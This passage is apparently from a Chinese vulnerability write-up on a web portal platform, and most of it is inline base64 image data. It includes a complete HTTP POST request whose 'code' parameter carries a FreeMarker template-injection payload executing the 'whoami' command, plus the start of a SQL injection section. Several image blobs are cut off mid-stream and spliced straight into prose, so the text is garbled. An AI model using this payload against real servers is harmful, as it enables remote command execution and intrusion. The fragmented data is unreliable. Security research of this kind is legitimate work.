iZ4Op2awmJn+xXGaP5azXx47pXOyqq0/mXMenmS2p2MREQAsR2Lp9dhh6j9zinnpno6moqzM/uwo9R8+Qq/5Z+xGeIT5RAJjX8v3fPZFsqdDqvW2zzvmqAtfimG7p4MRz8l9JtJ54DEl1n8lHJ/Y9ado88hhGr4ep2MnHhG3dTovjn+IF2ftI8PTwYiIiIiIiIiIiJyhCidO5FICRc3nXdoMmZkW0s21/8+n6eYMDF5e+PqaPB2KiIiIiBRhZfbHJ7l3j73AVEuGXT/0S6WlL5vGQ3MOYWt4Ga8+cyWRZV0wJZGbXk1kUf6TMCtb56RIBVT4OjyjHWDGkx+xPNlE1/97ifu7Gj0dUIXt3WxmVxaQlcGsbTC8u6cjAvbNYcK760kydeT+t26n9N2bxk877diAXZvT2D4kgI7VEGbNkM5fU55n5gE7jS+fyIvD6pV5ydj1J+n2Yyb50yUsVnux84u4VvFzUM4WNbPOrGj9t2xrBvF2IDqducfq0vGcqozSDcpdp8Kv93Vi4soylN3kdub9OYFzKx2klNnJr7n/tilsswFLV7AjdQE//l9DT0clIiIiIiIiIiJyRikucSJXbgLFU48+SL2I8GqOTkpTYvKEzWar1SNOFJaabsbb24jRWDN+fBERERERh0N/nGZcvsSJ8Aa+XFrXi/Q4Q+nZwCIlimHRmkPYMNC2Z99yNNi28+fcZEfiRLAfXzxcn2vrlGlgPxEpoqLX4Zkta9Mq1iUDIRcyqIY0Aq2othf6035tKnt9/RjVydPRANjYtGwzSUBot95lauQJgVzXIZmlO7Npe2HgWZQ4AZxewfIDdjC0oN/AcjRatyXz9C+OxInI8+uwZEwojc7sU1k8paLnoJw1amqdWdH6r39nP8L3ZZBaL4ARNT1xokJ1qtRoSfEk2HLf2EiITwKUPCEiIiIiIiIiIlJWJ6NjmDxlGimpqQDUDQ8jLj7R+Xnu++SUFF55cyoTJ4yjYWRlf//4jXvPe5oVZZz7nLGzWPSouq0pToltzdIzMqsrjhojPSOT4MAAT4chIiIiIk5mvttsJfe3/ZALwtlxewgaL0zcYt8KVp4ETB0Y2Kc83wNS+WmXI6Gnx4AIJU6IVEaFr8MzWTorV+wkE2jcoy9tPB1OJZmaRbD6zQhPh5EnfS1L/rMAkfQZ2KqMC/kw8q6mjKzKuGqofUs2cALwPb8n5boEd5hZkAFgYsKNSpyQiqvoOZh4JJH3lqQxO86XHx6POLuSnqrQ4d1xfPinmVlBQRy+I8zT4eC5OjODlQuSefPfDCL6N+UrF6NKVLT+i+jegH3FjlJR+nqrVYXq1IKMfqGEBRTzfSk8GJ+KR3dGs6bsYtVPC/nl9z9Z2/gBNr47tHpWfO7tPDDoN55ZHAeNhvL4/+kHVBERERERERERkbKKiY3njXc+dCZO1AkL4fGHxjHxuVec8zz+0Dhen/I+CYnJpKSm8sY7H7phBAo/wsLrUDf/JJuZxKQMbD5B1A0u+JfWwu+loGKTJ2w2GxaLtTpjqREsFis2P5tGnxARERGpMSzsjst716ujEifEXSrTi6qdZAuAkc4tNP6JSMWdpb0Zq5f1KhW9ZD177WBs1Z3B9T0dTQ1n28rijSlAMD36dy7fiF7pdtIBwny46GzJexL3q8Q5eHxzClO32yBc3w7caePyFL44DLTzdCQ5PFZnZvDR4nTWAoOrca2eW69r7qhTG930mXo4c+HAJxMY99UJx5tqzUENZ9i7yxhWnasUERERERERERGpBWJi43
根据前端页面接收的所有参数把uuidmoduId传参进行请求参数任意即可</p>
<p><a id=img6 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182102-843cb100-87ba-1.png title><img src="data:image/png;base64,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
数据包如下:</p>
<pre><code>POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
moduId=1&amp;code=${"freemarker.template.utility.Execute"?new()("whoami")}&amp;uuid=1</code></pre>
<p><a id=img7 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182116-8cac8522-87ba-1.png title><img src="data:image/png;base64,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
<h1 id=toc-1>SQL注入</h1>
<p>这个漏洞好像是一个通用组件漏洞,用友时空也存在该漏洞</p>
<p>通过请求接口名去搜索后端处理处理的代码</p>
<p><a id=img8 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182126-9260ccda-87ba-1.png><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABUEAAAFuCAYAAACvLdlQAACkF0lEQVR4nOz9eZgb130nen8PegWB7mZjay7NXtirmqIkizspWXLGiSNKlOTl5o4d2Y4SO+NJZl4v8yQzmbzvO5O5N3cyM89N4veZZDJxEsdLxjeJY1uSJWa1aYukRFGyLW7qfaGaS2PpJrsBolec949CYS0AVUBVoxv9/TyPHrGBWs6pOgVU/XDO+Ynnn39ehpfWQMbdmQuWuwhERERERERERERUgK3cBSAiIiIiIiIiIiKyEoOgREREREREREREVNEYBCUiIiIiIiIiIqKKxiAoERERERERERERVTQGQYmIiIiIiIiIiKiiMQhKREREREREREREFY1BUCIiIiIiIiIiIqpoDIISERERERERERFRRWMQlIiIiIiIiIiIiCoag6BERERERERERERU0RgEJSIiIiIiIiIioorGICgRERERERERERFVNAZBiYiIiIiIiIiIqKJVl7sAREREREREW111dTU8bhccdjuqbOb2VVmLxRCJRhEMzWJ1ddXUbRMREW0WDIISERERERGVUXV1Ndp270J1VZUl26+y2dDocGBbfT2u37jJQCgREW1JDIISERERERGVkcftQnVVFcL37uF2IIjVtTVTt19dVYUdXg+c27bB43bh9ozf1O0TEW1Vv/KZf2np9v/wj/6HpdvPVGn1ycQ5QYmIiIiIiMpoW309AOB2MGR6ABQAVtfWcDsYStsXERGVzorP7PXY9la16XqCStd2eACEZu/oep0A6fXAByAQCJa7KLRBsE1sbeU6/2x3RERE2tRh8FYOU1e3bdWQ+/XEexki2ij+8Z/+ET/7Mx+wbNvlYnaPTat7mOpV9iCoGrxEaBYhkb9jqpTt+JmnH0WnEJg48xX8w4Qt7+uVzuvthdeV+sosAoMBBIRIvCJlLz703En0CIGRl38X3x4SWduhzUFKD3y+Agv5k+dfSg/e+8nncNQ9i9FXvpI492wT5pHSA1+/C96U1wKzsxv6xrhc55/tLjf1gSr1+l3X/ef4rCAios3pwfv3YW9HJ6befRc/evttU7eduB8t03eWUgbey5A1Nvs90WYv/2Y1Pj6Os+fO4ZETJ0zd7tlz5zA+Pm7qNqnMQdDU4KWUU/jel89grEAgdKuT3l6899hRHOt2ay/wJCCDF/DnXzlX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
<p><a id=img9 href=https://xzfile.aliyuncs.com/media/upload/picture/20241011182132-95f83f68-87ba-1.png title><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACjwAAAauCAYAAADrLQOEAAEAAElEQVR4nOz9eXzV9Z33/z/f52QnkP0kIRGSsIYAEsAFUSgotirqqOjYbdq6tHPZr7VzTWdp+2292l5tr5nr6syv+p1eM2q36XSZkepYGa3FouACChJEFgFJQJbsG4EEkpzz/v1xzklOkpPlLOGchMf9dvPWcM7n/Xm/Piv2lqevt7l29RorAAAAAAAAAAAAAAAAAACAOOaIdQEAAAAAAAAAAAAAAAAAAACjIfAIAAAAAAAAAAAAAAAAAADiHoFHAAAAAAAAAAAAAAAAAAAQ9wg8AgAAAAAAAAAAAAAAAACAuJfQ2dEe6xoAAAAAAAAAAAAAAAAAAABGRIdHAAAAAAAAAAAAAAAAAAAQ9xLSpmZEvBN/l0hjz0e8LwAIRVZOfqxLADBJnO+JdQUAAAAAAAAAAAAAAGAkdHgEAAAAAAAAAAAAAAAAAABxj8AjAAAAAAAAAAAAAAAAAACIewQeAQAAAAAAAAAAAAAAAABA3CPwCAAAAAAAAAAAAAAAAAAA4h6BRwAAAAAAAAAAAAAAAAAAEPcIPAIAAAAAAAAAAAAAAAAAgLhH4BEAAAAAAAAAAAAAAAAAAMQ9Ao8AAAAAAAAAAAAAAAAAACDuEXgEAAAAAAAAAAAAAAAAAABxj8AjAAAAAAAAAAAAAAAAAACIewQeAQAAAAAAAAAAAAAAAABA3CPwCAAAAAAAAAAAAAAAAAAA4h6BRwAAAAAAAAAAAAAAAAAAEPcSYl1AuExGnpyFpTLZ02XSpsqkTJEk2fPnZDs7ZFtOy11bI9veGONKAUx0dmq2bN5lUma+bEq6lJzq/eJCl8z5s1JbvUzjCZmOltgWCgAAAAAAAAAAAAAAAExi5trVa2ykO+nsaPfuzJ6PuKDROKfPlrN8hczUzDFtbzva5D64Xe7TH4xvYQBiIisnf/x2nj9T7rKl0pRpY9v+3Bk5q3dL9cfHryYA4+Z8T6wrAAAAAAAAAAAAAAAAI5kwgUeTNk2Jyz8qk10Q1njbUqeeXS/Jdp6JcmUIxjO9SEvzC71/qN+pPafNuMxRJKn29KmLOjYe9o9+4xJ4TE2XZ+Fq2YzcsIab9iY59m2Vus5GubDR2TyXXJIaGxvibp82z6WKvDzvHxr36UBj9N8LkdQ6HucuGuK1rsmIwCMAAAAAAAAAAAAAAPFtQixpbXKLlHTFTf3LyIazj+wCJa2+R907X5RtCj+E5rFFuukrf6WPuOp14Dff0y+qoh/Ymcg8tkhLP/tnureiP5hq90u7f1Yb1fPmscv1mUc+pQpjtP/XXwppf5GMjYf9Y3zZrHx5Fn1ESkoJfx8ZuXJfcYsc770q01oftdpGnddW6M7P3aa5xujw89/Vswciv/eisU9rXaq483bdOjev/7PD0v5nGrX6gft1dU6Tjmx6IuJ6I6k11LE2r0Krr83VwWdeVaMZv2d8PK4pAAAAAAAAAAAAAADAROWIdQGjMblFSlpxe0Rhxz7JqUpacbtMblH4+yiq1AKXZEyBFiy+IvKaJpmim7xhR2vrVL9/s37z6806UC/O2ySXmZ0rZ8LY89POhARlZueNvuFFZrPy5am8MaKwY5+kFHkqb5TNGscltycI12pv2